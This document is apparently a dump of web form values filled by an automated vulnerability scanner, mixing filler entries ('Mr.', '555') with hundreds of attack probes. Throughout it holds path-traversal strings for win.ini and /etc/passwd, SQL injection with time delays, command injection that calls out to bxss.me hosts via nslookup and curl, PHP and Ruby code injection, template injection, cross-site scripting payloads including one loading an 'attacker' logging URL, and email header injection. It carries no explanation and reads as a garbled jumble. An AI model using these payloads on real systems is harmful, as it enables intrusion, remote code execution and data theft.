unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

-1' OR 2+300-300-1=0+0+0+1 --

Mr.

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

555

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

xfs.bxss.me

<esi:include src="http://bxss.me/rpb.png"/>

-1 OR 2+429-429-1=0+0+0+1

Mr.

555

<!--

Mr.

555

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

555

'+'A'.concat(70-3).concat(22*4).concat(115).concat(90).concat(113).concat(83)+(require'socket'

'"

-1 OR 3*2>(0+5+481-481) --

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

555

./Mr.

555

"+"A".concat(70-3).concat(22*4).concat(97).concat(71).concat(106).concat(72)+(require"socket"

"+response.write(9905435*9473987)+"

bxss.me

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

bxss.me/t/xss.html?%00

-1 OR 3*2<(0+5+481-481) --

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1 OR 3+481-481-1=0+0+0+1 --

`(nslookup -q=cname hitjfirnbjaey7c288.bxss.me||curl hitjfirnbjaey7c288.bxss.me)`

Mr.

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

&(nslookup -q=cname hitdvkvzjrpca80f8b.bxss.me||curl hitdvkvzjrpca80f8b.bxss.me)&'\"`0&(nslookup -q=cname hitdvkvzjrpca80f8b.bxss.me||curl hitdvkvzjrpca80f8b.bxss.me)&`'

^(#$!@#$)(()))******

".gethostbyname(lc("hitpr"."cpgouaymf4931.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(69).chr(98).chr(87)."

Mr.

555

/../../../../../../../../../../boot.ini

Mr.

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

'.gethostbyname(lc('hitzp'.'plelkxzt44a2e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(83).chr(112).chr(66).'

../../../../../../../../../../windows/win.ini%00.jpg

C:\WINDOWS\system32\drivers\etc\hosts

!(()&&!|*|*|

<esi:include src="http://bxss.me/rpb.png"/>

${9999754+10000162}

&nslookup -q=cname hititnwqpsful48750.bxss.me&'\"`0&nslookup -q=cname hititnwqpsful48750.bxss.me&`'

)

Mr.

555

'.print(md5(31337)).'

555

Mr.

555

a9hoUgAW

$(nslookup -q=cname hitwksgxadtnh33fd6.bxss.me||curl hitwksgxadtnh33fd6.bxss.me)

file:///etc/passwd

${@print(md5(31337))}\

555

/../../../../../../../../../../windows/system32/BITSADMIN.exe

1CCqZKK38

Mr.

555

Mr.

555

Mr.

bxss.me

(nslookup -q=cname hitmlrdlmldls6cac3.bxss.me||curl hitmlrdlmldls6cac3.bxss.me))

Mr.

555

'.print(md5(31337)).'

Mr.

c:/windows/win.ini

|echo momchl$()\ hbnaox\nz^xyu||a #' |echo momchl$()\ hbnaox\nz^xyu||a #|" |echo momchl$()\ hbnaox\nz^xyu||a #

${@print(md5(31337))}

555

Mr.

555

Mr.

555

../../../../../../../../../../../../../../windows/win.ini

&echo vjmxbz$()\ zsxyse\nz^xyu||a #' &echo vjmxbz$()\ zsxyse\nz^xyu||a #|" &echo vjmxbz$()\ zsxyse\nz^xyu||a #

${@print(md5(31337))}\

c:/windows/win.ini

555

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

555

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

555

'"()

Mr.

'+'A'.concat(70-3).concat(22*4).concat(108).concat(85).concat(119).concat(84)+(require'socket'

555

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

555

Mr.

Socket.gethostbyname('hiteg'+'beieemcv7bb01.bxss.me.')[3].to_s)+'

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

555

http://bxss.me/t/fit.txt%3F.jpg

Mr.

555

Mr.

555

Mr.

Mr.

555

Mr.

555

Mr.

555

Mr.

555

555

Mr.

555

Mr.

Mr.

555

Mr.

555

Mr.

555

Mr.

555

555

555

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(118).concat(69).concat(119).concat(80)+(require'socket'

555

"+"A".concat(70-3).concat(22*4).concat(113).concat(74).concat(104).concat(79)+(require"socket"

555

Mr.

555

Mr.

555

Mr.

555

Mr.

Q0oqNnq1') OR 819=(SELECT 819 FROM PG_SLEEP(15))--

xXfCI5BU' OR 345=(SELECT 345 FROM PG_SLEEP(5.071))--

IHlN1Th0' OR 111=(SELECT 111 FROM PG_SLEEP(15))--

Mr.

555

<a HrEF=http://xss.bxss.me></a>

'.print(md5(31337)).'

555

Mr.

1<img sRc='http://attacker-9784/log.php?

Mr.

555

${@print(md5(31337))}\

555

Mr.<input autofocus onfocus=sfHP(9677)>

Mr.

555

Mr.

1<aWK1PeF x=9246>

�<img zzz onmouseover=sfHP(95121) //�>

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

Mr.<body onload=sfHP(9945)>

Mr.

../Mr.

555

";print(md5(31337));$a="

Mr.

-1)) OR 246=(SELECT 246 FROM PG_SLEEP(5.071))--

Mr.

555

Mr.<svg

../../../../../../../../../../../../../../windows/win.ini

555

Mr.

1<input autofocus onfocus=Xo8i(9620)>

Mr.

';print(md5(31337));$a='

../../../../../../../../../../../../../../etc/passwd

555

Mr.<InvalidTag

Mr.

�<img zzz onmouseover=Xo8i(99411) //�>

Mr.

555

Mr.

555

Mr.

555

Mr.<InvalidTag

Mr.

555

Mr.<WU2O0G>EXIKC[!+!]</WU2O0G>

Mr.

file:///etc/passwd

Mr.<InvalidTag >sfHP(9224)</ScRiPt>

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

555

Mr.

555

Mr.

1<body onload=Xo8i(9752)>

Mr.

555

Mr.

1<svg

� onload=Xo8i(9426);>

Mr.

555

Mr.

555

Mr.

Mr.

555

Mr.

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

555

Mr.

<%={{={@{#{${dfb}}%>

Mr.

1<InvalidTag >Xo8i(9233)</ScRiPt>

Mr.

555

Mr.

555

Mr.

OhGtUwvf')); waitfor delay '0:0:15' --

Mr.

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

555

Mr.

dfb__${98991*97996}__::.x

dfb${98991*97996}::.x

Mr.

555

Mr.

555

dfb[[${98991*97996}]]xca

Mr.

dfb[[${98991*97996}]]xca

"+"A".concat(70-3).concat(22*4).concat(116).concat(65).concat(106).concat(77)+(require"socket"

555

Mr.

555

Mr.

zTcyAggv'); waitfor delay '0:0:15' --

Mr.

555

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

'+'A'.concat(70-3).concat(22*4).concat(108).concat(89).concat(108).concat(74)+(require'socket'

Socket.gethostbyname('hitkz'+'mldrfttt54d17.bxss.me.')[3].to_s)+'

Mr.

"+"A".concat(70-3).concat(22*4).concat(108).concat(82).concat(119).concat(88)+(require"socket"

Socket.gethostbyname("hitry"+"yfrouqmi5a5f2.bxss.me.")[3].to_s)+"

Mr.

Mr.

555

Mr.

<th:t="${dfb}#foreach

Mr.

555

555

bfgx2168%C0%BEz1%C0%BCz2a%90bcxhjl2168

Mr.

nqePXmRr'); waitfor delay '0:0:15' --

Mr.

'"()&%<zzz><InvalidTag >qj79(9698)</ScRiPt>

Mr.'"()&%<zzz><InvalidTag >sfHP(9325)</ScRiPt>

Mr.

1'"()&%<zzz><InvalidTag >Xo8i(9945)</ScRiPt>

555

Mr.

555

'+'A'.concat(70-3).concat(22*4).concat(110).concat(84).concat(115).concat(89)+(require'socket'

Socket.gethostbyname('hitcd'+'ltkpqdul273c0.bxss.me.')[3].to_s)+'

Mr.

555

Mr.

"+"A".concat(70-3).concat(22*4).concat(97).concat(69).concat(120).concat(67)+(require"socket"

Socket.gethostbyname("hitgc"+"gedvfoykeff2a.bxss.me.")[3].to_s)+"

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

Mr.

1059z7

Mr.

1}body{zzz:Expre/**/SSion(WCrL(9915))}

Mr.

Mr.

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9021></ScRiPt>

Mr.

1<InvalidTag

>WCrL(9906)</ScRiPt>

dfb{{98991*97996}}xca

Mr.

Mr.

Mr.

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

Mr.

bfgx5359%C0%BEz1%C0%BCz2a%90bcxhjl5359

'"()&%<zzz><InvalidTag >PKjs(9788)</ScRiPt>

Mr.

'"()&%<zzz><InvalidTag >WCrL(9227)</ScRiPt>

Mr.

555

Mr.

555

Mr.

555

Mr.

555

'+'A'.concat(70-3).concat(22*4).concat(101).concat(83).concat(109).concat(72)+(require'socket'

555

Mr.

Mr.

555

Mr.

555

Mr.

555

Mr.

"+"A".concat(70-3).concat(22*4).concat(121).concat(84).concat(112).concat(83)+(require"socket"

555

Mr.

Mr.

cmbopbFS' OR 466=(SELECT 466 FROM PG_SLEEP(15))--

Xg2InIAQ'); waitfor delay '0:0:15' --

Mr.

Mr.'"()&%<zzz><InvalidTag >0cEE(9561)</ScRiPt>

bxss.me

Mr.

`(nslookup -q=cname hitmbstrlakrx12260.bxss.me||curl hitmbstrlakrx12260.bxss.me)`

Mr.

Http://bxss.me/t/fit.txt

Mr.

|(nslookup -q=cname hittuthdbhthn190a7.bxss.me||curl hittuthdbhthn190a7.bxss.me)

Mr.

'.print(md5(31337)).'

Mr.

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

Mr.

&(nslookup -q=cname hitvwbdvelhjjb628b.bxss.me||curl hitvwbdvelhjjb628b.bxss.me)&'\"`0&(nslookup -q=cname hitvwbdvelhjjb628b.bxss.me||curl hitvwbdvelhjjb628b.bxss.me)&`'

Mr.

Http://bxss.me/t/fit.txt

Mr.

file:///etc/passwd

Mr.

1hcKCLmnO

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

${9999639+10000088}

-1' OR 2+735-735-1=0+0+0+1 --

Mr.

'.gethostbyname(lc('hitfb'.'xsmupirk5e0c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(70).chr(103).chr(89).'

Mr.

-1 OR 2+55-55-1=0+0+0+1

Mr.

Mr.

Mr.9305622

Mr.

'.print(md5(31337)).'

Mr.

xfs.bxss.me

Mr.

-1 OR 2+228-228-1=0+0+0+1 --

Mr.

'"()&%<zzz><InvalidTag >y22y(9719)</ScRiPt>

Mr.

<!--

Mr.

'+'A'.concat(70-3).concat(22*4).concat(106).concat(78).concat(115).concat(81)+(require'socket'

Socket.gethostbyname('hitbh'+'hrvipjel64662.bxss.me.')[3].to_s)+'

Mr.

1%0abcc:009247.60685-3567.60685.51c6f.19899.2@bxss.me

Mr.

xfs.bxss.me

";print(md5(31337));$a="

'"

Mr."||sleep(271000)smblxx||"

Mr.

to@example.com>%0d%0abcc:009247.60685-3566.60685.51c6f.19899.2@bxss.me

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

';print(md5(31337));$a='

Mr.

1%0abcc:009247.60685-3565.60685.51c6f.19899.2@bxss.me

Mr.

"+"A".concat(70-3).concat(22*4).concat(103).concat(76).concat(99).concat(72)+(require"socket"

Socket.gethostbyname("hitkg"+"ymulwwdqb81e7.bxss.me.")[3].to_s)+"

Mr.'||sleep(271000)ylswuj||'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

;(nslookup -q=cname hitupschhkndz00697.bxss.me||curl hitupschhkndz00697.bxss.me)|(nslookup -q=cname hitupschhkndz00697.bxss.me||curl hitupschhkndz00697.bxss.me)&(nslookup -q=cname hitupschhkndz00697.bxss.me||curl hitupschhkndz00697.bxss.me)

Mr.

`(nslookup -q=cname hitscasliyzfm8aadd.bxss.me||curl hitscasliyzfm8aadd.bxss.me)`

Mr.

'+'A'.concat(70-3).concat(22*4).concat(103).concat(75).concat(106).concat(89)+(require'socket'

Socket.gethostbyname('hitra'+'jpxgsccc49f44.bxss.me.')[3].to_s)+'

Mr.

"+response.write(9444196*9012399)+"

Mr.

"+"A".concat(70-3).concat(22*4).concat(97).concat(79).concat(97).concat(90)+(require"socket"

Socket.gethostbyname("hitef"+"rvdrpzig702d3.bxss.me.")[3].to_s)+"

Mr."&&sleep(271000)kklrsg&&"

Mr.

".gethostbyname(lc("hitcf"."swocdsxw296df.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(69).chr(113).chr(90)."

Mr.

'+response.write(9444196*9012399)+'

Mr.

bxss.me/t/xss.html?%00

Mr.

^(#$!@#$)(()))******

Mr.

Mr.'&&sleep(271000)fualrk&&'

Mr.

|(nslookup -q=cname hitkaljyfgvsa178a5.bxss.me||curl hitkaljyfgvsa178a5.bxss.me)

Mr.

'.gethostbyname(lc('hitqy'.'uofbjtfjefac5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(67).chr(109).chr(81).'

Mr.

response.write(9444196*9012399)

Mr.

'"()

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

../Mr.

Mr.

Mr.

!(()&&!|||

Mr.

&(nslookup -q=cname hitxxidshhtly33905.bxss.me||curl hitxxidshhtly33905.bxss.me)&'\"`0&(nslookup -q=cname hitxxidshhtly33905.bxss.me||curl hitxxidshhtly33905.bxss.me)&`'

Mr.

bxss.me/t/xss.html?%00

Mr.

1&n994757=v955820

&nslookup -q=cname hitjainyvutvs0ac9b.bxss.me&'\"`0&nslookup -q=cname hitjainyvutvs0ac9b.bxss.me&`'

Mr.

1&n909352=v986887

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

echo rzpniv$()\ woeuao\nz^xyu||a #' &echo rzpniv$()\ woeuao\nz^xyu||a #|" &echo rzpniv$()\ woeuao\nz^xyu||a #

'+'A'.concat(70-3).concat(22*4).concat(105).concat(89).concat(102).concat(89)+(require'socket'

'+response.write(9993162*9674073)+'

Mr.

xp5Cvj7L

response.write(9993162*9674073)

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

555

Mr.

555

Mr.

555

";print(md5(31337));$a="

Mr.

555

Mr.

555

Mr.

';print(md5(31337));$a='

Mr.

';print(md5(31337));$a='

Mr.

555

Mr.

555

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

'.print(md5(31337)).'

555

Mr.

555

Mr.

555

file:///etc/passwd

555

555

Mr.

555

Mr.

555

Mr.

555

${@print(md5(31337))}

555

Mr.

555

555

Mr.

555

Mr.

".gethostbyname(lc("hityl"."kypjrair214e7.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(72).chr(121).chr(69)."

555

Mr.

555

Mr.

555

Mr.

555

555

Mr.

555

Mr.

555

Mr.

";print(md5(31337));$a="

Mr.

bxss.me

Mr.

555

Mr.

555

Mr.

555

Mr.

/etc/shells

Mr.

555

Mr.

".gethostbyname(lc("hitia"."wzocqolc8c935.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(82).chr(112).chr(80)."

555

Mr.

555

Mr.

555

Mr.

./555

Mr.

555

Mr.

555

555

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

555

Mr.

555

Mr.

file:///etc/passwd

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

555

'+'A'.concat(70-3).concat(22*4).concat(121).concat(75).concat(122).concat(75)+(require'socket'

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

555

Mr.

555

Mr.

555

Mr.

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(118).concat(83).concat(104).concat(79)+(require'socket'

"+"A".concat(70-3).concat(22*4).concat(112).concat(90).concat(99).concat(70)+(require"socket"

Mr.

555

Mr.

555

Mr.

555

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(111).concat(68).concat(111).concat(78)+(require'socket'

Socket.gethostbyname('hitvt'+'garwgkpg9d71d.bxss.me.')[3].to_s)+'

Mr.

555

Mr.

"+"A".concat(70-3).concat(22*4).concat(109).concat(82).concat(113).concat(75)+(require"socket"

555

Mr.

1<img sRc='http://attacker-9738/log.php?

1<as9ys8i x=9121>

1<ifRAme sRc=9957.com></IfRamE>

1<aK6lKk2<

1<WFCLXW>XKCB8[!+!]</WFCLXW>

1<img sRc='http://attacker-9810/log.php?

1<alaxPfe x=9845>

1tCQwx

1}body{zzz:Expre/**/SSion(6FTz(9553))}

1<ifRAme sRc=9336.com></IfRamE>

<a HrEF=jaVaScRiPT:>

1<WRYONS>M80KV[!+!]</WRYONS>

<a HrEF=http://xss.bxss.me></a>

1OVXHX

1<input autofocus onfocus=6FTz(9948)>

1}body{zzz:Expre/**/SSion(LUn6(9295))}

�<img zzz onmouseover=6FTz(96071) //�>

1<ScRiPt>6FTz(9558)</sCripT>

1\u003CScRiPt\6FTz(9055)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%36%46%54%7A%289648%29%3C%2F%73%43%72%69%70%54%3E

1<input autofocus onfocus=LUn6(9624)>

�<img zzz onmouseover=LUn6(91041) //�>

1<img/src=">" onerror=alert(9631)>

1<ScRiPt>LUn6(9466)</sCripT>

1<img src=xyz OnErRor=6FTz(9945)>

1\u003CScRiPt\LUn6(9494)\u003C/sCripT\u003E

1<img src=//xss.bxss.me/t/dot.gif onload=6FTz(9865)>

1<body onload=6FTz(9697)>

%31%3C%53%63%52%69%50%74%20%3E%4C%55%6E%36%289002%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9836)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9758'>

1<img src=xyz OnErRor=LUn6(9510)>

1<isindex type=image src=1 onerror=6FTz(9068)>

1<svg

1<img src=//xss.bxss.me/t/dot.gif onload=LUn6(9070)>

1<body onload=LUn6(9383)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9368'>

1<InvalidTag

1<isindex type=image src=1 onerror=LUn6(9274)>

1<svg

� onload=LUn6(9044);>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9691></ScRiPt>

1<InvalidTag

>LUn6(9681)</ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9063></ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%36%46%54%7A%28%39%39%39%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag

>LUn6(9396)</ScRiPt>

1<InvalidTag>6FTz(9042)</script>9042

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4C%55%6E%36%28%39%34%39%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>6FTz(9260)</script>

1<InvalidTag>LUn6(9902)</script>9902

1<WESWD3>MCPTP[!+!]</WESWD3>

1<InvalidTag>LUn6(9875)</script>

1<InvalidTag >6FTz(9559)</ScRiPt>

1<WXOX9B>WARPI[!+!]</WXOX9B>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1<InvalidTag >LUn6(9799)</ScRiPt>

dfb${98991*97996}::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

bfgx9564%C0%BEz1%C0%BCz2a%90bcxhjl9564

bfgx8994%C0%BEz1%C0%BCz2a%90bcxhjl8994

bfg5229%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5229

bfg4597%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl4597

19691177

19900058

'"()&%<zzz><InvalidTag >LUn6(9623)</ScRiPt>

'"()&%<zzz><InvalidTag >6FTz(9723)</ScRiPt>

1'"()&%<zzz><InvalidTag >LUn6(9565)</ScRiPt>

1'"()&%<zzz><InvalidTag >6FTz(9418)</ScRiPt>

1<ax4wahb<

1<img sRc='http://attacker-9147/log.php?

1<akTKKET x=9242>

1<ifRAme sRc=9706.com></IfRamE>

1<WYDGMR>EKPZR[!+!]</WYDGMR>

1kskPC

1}body{zzz:Expre/**/SSion(SF5R(9004))}

